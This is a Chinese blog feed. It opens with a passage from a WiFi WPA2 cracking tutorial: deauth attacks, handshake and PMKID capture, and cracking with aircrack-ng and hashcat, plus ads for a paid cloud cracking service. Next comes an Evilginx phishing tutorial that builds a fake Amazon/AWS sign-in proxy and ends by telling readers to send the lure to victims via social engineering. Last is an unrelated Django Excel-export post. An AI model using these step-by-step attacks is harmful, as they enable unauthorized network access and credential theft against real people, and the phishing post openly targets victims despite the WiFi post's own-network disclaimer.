sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon

当 airodump-ng 右上角显示 “WPA handshake: AA:BB:CC:DD:EE:FF” 时，说明握手包已成功抓取。

5. 退出监听模式

1
2
3
4


sudo airmon-ng stop wlan0mon

# 恢复网络服务
sudo systemctl restart NetworkManager

此时你会得到一个 capture-01.cap 文件，这就是包含 WPA2 握手信息的数据包。

第二步：验证握手包是否完整

在开始破解前，确认 cap 文件包含完整的握手信息：

使用 aircrack-ng 验证

1

aircrack-ng capture-01.cap

如果输出中包含 “1 handshake”，说明握手包有效。

使用 tshark 详细查看

1
2
3
4
5


# 安装 Wireshark 命令行工具
sudo apt install tshark

# 查看握手包详情
tshark -r capture-01.cap -Y "eapol" -V

使用在线工具验证

你也可以将 cap 文件上传到 catpasswd.com 直接进行密码恢复，无需手动验证——系统会自动检测握手包的有效性。

第三步：破解 WiFi 密码

方法 1：aircrack-ng 字典攻击

最简单直接的方式：

1
2
3


# -w 指定字典文件
# -b 指定目标 BSSID
aircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.cap

如果密码在字典中，输出类似：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13


 Aircrack-ng 1.7

 [00:02:35] 2847536/9822786 keys tested (19050.27 k/s)

 Time left: 6 minutes, 7 seconds 28.98%

 KEY FOUND! [ mypassword123 ]

 Master Key : 4A 2B 3C 1D 5E 6F 7A 8B 9C 0D 1E 2F 3A 4B 5C 6D
 7E 8F 9A 0B 1C 2D 3E 4F 5A 6B 7C 8D 9E 0F 1A 2B

 Transient Key : ...
 EAPOL HMAC : ...

方法 2：Hashcat GPU 加速（推荐，最快）

转换 cap 文件为 Hashcat 格式

1
2
3
4
5
6


# 使用 hcxtools 转换
# 安装
sudo apt install hcxtools

# 转换为 .hc22000 格式
hcxpcapngtool -o wifi_hash.hc22000 capture-01.cap

使用 Hashcat 破解

1
2
3
4


# WPA/WPA2 在 Hashcat 中的模式是 22000
hashcat -m 22000 -a 0 wifi_hash.hc22000 wordlist.txt

# 使用 GPU 加速，速度通常在 100K-500K/s（取决于显卡）

常用攻击策略

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# 字典攻击
hashcat -m 22000 -a 0 wifi_hash.hc22000 rockyou.txt

# 规则攻击（对字典中的密码做变形：加数字、改大小写等）
hashcat -m 22000 -a 0 wifi_hash.hc22000 rockyou.txt -r rules/best64.rule

# 掩码攻击（假设记得密码是 8 位小写字母+数字）
hashcat -m 22000 -a 3 wifi_hash.hc22000 "?l?l?l?l?l?l?d?d"

# 组合攻击
hashcat -m 22000 -a 1 wifi_hash.hc22000 wordlist1.txt wordlist2.txt

方法 3：Pyrit（专为 WPA 优化的工具）

Pyrit 可以预计算 WPA 的 PMK（Pairwise Master Key），加速破解：

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17


# 安装
pip install pyrit

# 导入字典
pyrit -r rockyou.txt import_passwords

# 导入 cap 文件
pyrit -r capture-01.cap import_capture

# 设置 ESSID
pyrit -e "MyHomeWiFi" create_essid

# 预计算 PMK（利用 GPU/CPU 加速）
pyrit batch

# 攻击
pyrit attack_db

方法 4：Python 脚本自己写

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26


from scapy.all import *
from hashlib import pbkdf2_hmac
import hmac, struct

def verify_wpa_password(cap_file, password, ssid):
 """验证一个密码是否是正确的 WPA2 密码"""

 # 从 cap 文件读取握手包
 packets = rdpcap(cap_file)

 # 计算 PMK (Pairwise Master Key)
 pmk = pbkdf2_hmac('sha1', password.encode(), ssid.encode(), 4096, 32)

 print(f"测试密码: {password}")
 print(f"PMK: {pmk.hex()}")

 # 实际验证需要完整的握手数据和 PTK 推导
 # 这里简化展示，完整实现较复杂
 return pmk

# WiFi 密码通常是 8-63 位的 ASCII 字符
ssid = "MyHomeWiFi"
test_passwords = ["password123", "wifi1234", "home2024"]

for pwd in test_passwords:
 verify_wpa_password("capture-01.cap", pwd, ssid)

方法 5：云端在线恢复服务

如果不想自己配置环境或本地算力不足，可以把 cap 文件交给云端服务处理：

猫密网 (Catpasswd) 支持 WPA/WPA2 握手包（.cap 文件）的密码恢复。

优势

无需安装 aircrack-ng 等工具：直接上传 cap 文件即可
云端千万级字典：覆盖了大量常见 WiFi 密码组合，包括：
- 常见 WiFi 密码（如 12345678、88888888）
- 手机号组合
- 拼音 + 数字组合
- 各地区的常见密码模式
分布式算力：比单台电脑快数十倍
文件小：cap 文件通常只有几 KB 到几 MB，上传很快

使用流程

按上面的步骤抓取握手包得到 .cap 文件
访问猫密网 → 上传文件
上传 .cap 文件，填写邮箱
系统自动分析握手包有效性并开始密码恢复
成功后邮件通知

💡 小技巧：如果你不确定抓到的 cap 文件是否包含有效的握手数据，可以直接上传到猫密网，系统会自动检测。如果握手包无效，不会开始恢复也不会收费。

提高 WiFi 密码恢复成功率的技巧

1. 使用高质量 WiFi 专用字典

通用字典（如 rockyou.txt）的 WiFi 密码覆盖率不高。推荐使用专门的 WiFi 密码字典：

WiFi-Password-List：GitHub 上有专门的 WiFi 常见密码合集
国内常见 WiFi 密码：88888888、12345678、手机号后8位等
自定义字典：根据你对设置者的了解生成可能的密码

2. 常见 WiFi 密码模式

中国人设置 WiFi 密码最常见的模式：

模式	示例	频率
8位纯数字	12345678、88888888	⭐⭐⭐⭐⭐
手机号	13812345678	⭐⭐⭐⭐
拼音+数字	woaini520、zhangwei123	⭐⭐⭐
门牌号+楼号	1602dong、501hao	⭐⭐
英文名+年份	michael2020	⭐⭐

3. 利用规则攻击

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11


# 创建一个规则文件 wifi.rule
cat > wifi.rule << 'EOF'
$1 $2 $3 $4 $5 $6 $7 $8
$8 $8 $8 $8 $8 $8 $8 $8
$1 $2 $3 $4 $5 $6 $7 $8 $9 $0
^[Ww]ifi
^$1$2$3$4
EOF

# 使用规则攻击
hashcat -m 22000 -a 0 wifi_hash.hc22000 common_words.txt -r wifi.rule

4. PMKID 攻击（无需握手的新方法）

WPA2 有一个较新的攻击向量——PMKID，不需要等待设备握手：

1
2
3
4
5
6
7


# 使用 hcxdumptool 抓取 PMKID
sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1

# 等待几分钟，如果路由器支持 PMKID，会自动获取
# 然后转换并破解
hcxpcapngtool -o pmkid.hc22000 pmkid_capture.pcapng
hashcat -m 22000 -a 0 pmkid.hc22000 wordlist.txt

PMKID 的优势：不需要有设备在线，只要路由器开着就行。

各方法对比

方法	速度	难度	需要 GPU	适合场景
aircrack-ng	慢	中	否	简单字典攻击
Hashcat	极快	高	是	专业破解
Pyrit	快	中	可选	PMK 预计算
Python 脚本	慢	高	否	学习原理
猫密网	快	极低	否	普通用户

各品牌路由器能从管理页面查看密码吗？

如果你还能登录路由器管理页面，某些路由器可以直接查看 WiFi 密码：

品牌	管理页面地址	查看路径
TP-Link	192.168.0.1 或 192.168.1.1	无线设置 → 无线安全设置
小米	192.168.31.1	常用设置 → WiFi 设置
华为	192.168.3.1	我的 WiFi → 查看密码
华硕	192.168.1.1	无线网络 → 一般设置
OpenWrt	192.168.1.1	Network → Wireless → Edit

💡 小技巧：即使管理页面密码显示为星号（***），也可以在浏览器开发者工具中查看明文。右键点击密码框 → 检查元素 → 将 type="password" 改为 type="text"。

常见问题

Q: 抓到的 cap 文件显示"0 handshakes"怎么办？

说明没有抓到完整的四次握手。解决方法：

确保有设备连接到目标 WiFi
多发送几次 deauth 包强制重连
尝试更长的抓取时间
试试 PMKID 方法（不需要握手）

Q: WPA3 能破解吗？

WPA3 大幅增强了安全性：

使用 SAE（Simultaneous Authentication of Equals）替代 PSK
防离线字典攻击
目前没有已知的有效破解方法

如果你的 WiFi 是 WPA3 加密，目前基本无法离线破解。

Q: 内置笔记本网卡能抓握手包吗？

大多数内置网卡不支持监听模式，无法抓取握手包。建议购买支持监听模式的外置 USB 无线网卡（50-200 元），或直接使用猫密网上传已有的 cap 文件进行恢复。

Q: 5GHz 和 2.4GHz 频段的 WiFi 抓包有区别吗？

抓取方法相同，但需要注意：

无线网卡必须支持对应频段
5GHz 的信道更多，扫描时间可能更长
部分双频路由器在不同频段使用相同密码，可以从任一频段抓取

Q: 从手机上已经连接的 WiFi 能导出密码吗？

可以。已 root 的 Android 手机：

1
2
3
4


# WiFi 密码保存在以下文件中
cat /data/misc/wifi/WifiConfigStore.xml
# 或 Android 10+
cat /data/misc/apexdata/com.android.wifi/WifiConfigStore.xml

iPhone 可以通过 iCloud 钥匙串同步，在 Mac 的"钥匙串访问"中查看。

安全防护建议

既然你了解了 WiFi 密码的破解方式，也应该知道如何保护自己的网络：

使用 WPA3：如果路由器支持，优先使用 WPA3 加密
设置强密码：12 位以上，混合大小写 + 数字 + 特殊字符
禁用 WPS：WPS 存在已知漏洞，容易被绕过
关闭 PMKID：在路由器设置中关闭（如果支持）
定期更换密码：尤其是当不信任的设备连接过你的网络时
使用访客网络：为访客设置独立的 WiFi 网络，与主网络隔离

总结

WiFi 密码恢复的核心步骤是：

先检查路由器管理页面：可能直接看到密码
检查手机/电脑已保存的 WiFi 密码：Android、iOS、Windows、macOS 都可以查看
抓取握手包：使用 aircrack-ng 套件
破解密码：Hashcat（最快）、aircrack-ng（最简单）、猫密网（最省心）

记住，本文所有方法仅限恢复自己拥有的 WiFi 网络密码。保护网络安全，从设置一个强密码开始。

Evilginx 钓鱼网站实战案例教程

Sat, 24 Aug 2024 19:49:52 +0000

Evialginx是一个中间人网络攻击框架, 用来盗取用户的账号密码, 向被害人发送钓鱼链接, 被害人点击进去钓鱼网站, 此时钓鱼网站的域名跟真实网站不一样, 其他都一样, 如果输入账号密码则会泄露账号的敏感数据, 请勿打开不明链接, 看清链接网址, 基本上就能杜绝钓鱼链接. 下面展示系统安装配置过程

首先介绍下系统的环境

Debian 12
Evilginx 3.3
工作目录/root
对亚马逊账号进行钓鱼

接下来开始正式演示

1.下载与安装Evilginx

下载evilginx

1

git clone https://github.com/kgretzky/evilginx2

安装golang

1

wget https://go.dev/dl/go1.23.0.linux-amd64.tar.gz

1

rm -rf /usr/local/go && tar -C /usr/local -xzf go1.23.0.linux-amd64.tar.gz

1

export PATH=$PATH:/usr/local/go/bin

编译evilginx

1

make build

测试运行

1

./build/evilginx -v

2.配置evilginx

编写phishlets模版(这里我直接下载)

1

git clone https://github.com/simplerhacking/Evilginx3-Phishlets.git phishlets

创建config文件夹, 然后运行evilginx

1

mkdir config

1

./evilginx2/build/evilginx -c /var/config -p /var/phishlets

进行基础配置

1

config domain 你的域名

1

config ipv4 bind 绑定本地网卡

1

config external 设定外网地址

1

config unauth_url https://signin.aws.amazon.com

我的示例:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


 domain : testfish.xxxx.com
 external_ipv4 : 172.xxx.xxx.176
 bind_ipv4 : 172.xxx.xxx.176
 https_port : 443
 dns_port : 53
 unauth_url : https://signin.aws.amazon.com
 autocert : on
 gophish admin_url : https://testfish.xxxxx.com:7777
 gophish api_key : c60e5bce24856c2c4giuearyig73
 gophish insecure : false

配置钓鱼网站, 以亚马逊为例

1

phishlets create amazon test

1

phishlets hostname amazon:test amazon.xxxxx.com

1

phishlets enable amazon:test

配置钓鱼链接

1

lures create amazon:test

1

lures get-url 0

3.配置钓鱼网站的https域名(evilginx自动配置)

ns1.你的域名指向你的服务器IP
ns2.你的域名指向你的服务器IP
其他域名也指向你的服务器IP

4.通过社工手段将获取到的钓鱼链接发送给被害人

开始运行吧

1

./evilginx2/build/evilginx -c "配置目录" -p "钓鱼模版目录" -debug

至此整个流程就完成了!

Django Admin管理后台如何导出Excel表格

Sat, 12 Aug 2023 23:56:52 +0000

Django自带的管理后无法导出Excel表格，第三方的插件导出的话会很繁琐，而且导出格式会携带很多数据库冗余字段，使得表格很难看。给大家看一下我的解决办法，100%所见即所得，原样导出后台界面数据为Excel表格

一共分三步

安装Excel依赖
编写admin.ModelAdmin扩展
给指定Admin模型添加导出方法（actions）

1.安装依赖

1

pip install openpyxl beautifulsoup4

2.编写admin.ModelAdmin扩展

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36


from datetime import datetime
from django.http import HttpResponse
from django.contrib.admin.templatetags import admin_list
from django.contrib.admin.utils import lookup_field
from django.utils.safestring import SafeString
from bs4 import BeautifulSoup
from openpyxl import Workbook

class ExportExcelMixin(object):
 def get_export_ignore(self, request):
 return []

 def export_as_excel(self, request, queryset):
 response = HttpResponse(content_type='application/msexcel')
 download_filename = '{}_{}.xlsx'.format(self.model._meta, datetime.now().strftime('%Y-%m-%dT%H:%M:%S'))
 response['Content-Disposition'] = 'attachment; filename={}'.format(download_filename)
 wb = Workbook()
 ws = wb.active
 cl = self.get_changelist_instance(request)
 headers = admin_list.result_headers(cl)
 ws.append([str(field['text']) for field in headers][1:])
 for obj in queryset:
 results = []
 for display in self.get_list_display(request):
 if display in self.get_export_ignore(request):
 results.append(None)
 continue
 result = lookup_field(display, obj, cl.model_admin)[2]
 if type(result) is SafeString:
 result = BeautifulSoup(result, features="html.parser").text
 results.append(str(result))
 row = ws.append(results)
 wb.save(response)
 return response

 export_as_excel.short_description = '导出Excel'

3.给指定Admin模型添加导出方法

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


from django.contrib import admin
from order.admin import ExportExcelMixin
from order.models import Order

# 例举订单模型
@admin.register(Order)
class OrderAdmin(admin.ModelAdmin, ExportExcelMixin):
 # other code
 actions = ['export_as_excel']
 # other code

导出的格式是这样

现在订单模型的管理后台即可有导出按钮，选择指定列以后，点击导出Excel即可将页面内容导出为Excel。

我的第一篇博客

Sun, 23 Jul 2023 10:32:25 +0800

我做了一个博客，分享下开发日常

关于

Sun, 23 Jul 2023 00:00:00 +0000

我是一位独立开发者，自由职业者，去中心化拥护者

归档

Tue, 28 May 2019 00:00:00 +0000

搜索

Mon, 01 Jan 0001 00:00:00 +0000